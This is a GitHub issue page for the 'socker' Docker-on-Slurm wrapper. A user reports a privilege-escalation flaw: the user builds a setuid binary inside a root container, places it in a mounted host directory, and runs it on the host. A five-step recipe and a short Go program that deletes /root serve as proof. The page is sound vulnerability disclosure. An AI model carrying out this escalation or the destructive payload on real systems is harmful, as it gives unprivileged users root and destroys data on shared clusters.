search

unioslo / socker

A wrapper for secure running of Docker containers on Slurm
Other
26 stars 3 forks source link

It is not safe to run the container with root user privileges without any restrictions. #4

Open ansiz opened 6 years ago

ansiz commented 6 years ago

It is not safe to run the container with root user privileges without any restrictions. You mounted the host directory into container, and common user run as root in container, they can perform any dangerous operations with root privileges. For example:

  1. run a container
  2. build a program named hack, put it in the directory you mounted
  3. chmod +xs hack
  4. exit container
  5. cd to the directory, run this program

hack program code(in Golang):

package main

import "os"

func main() {
  os.RemoveAll("/root")
}

Use this code, common user can delete root directory, can also perform any dangerous operation in this way

ansiz commented 6 years ago

I am also looking for a solution, I hope to discuss with you.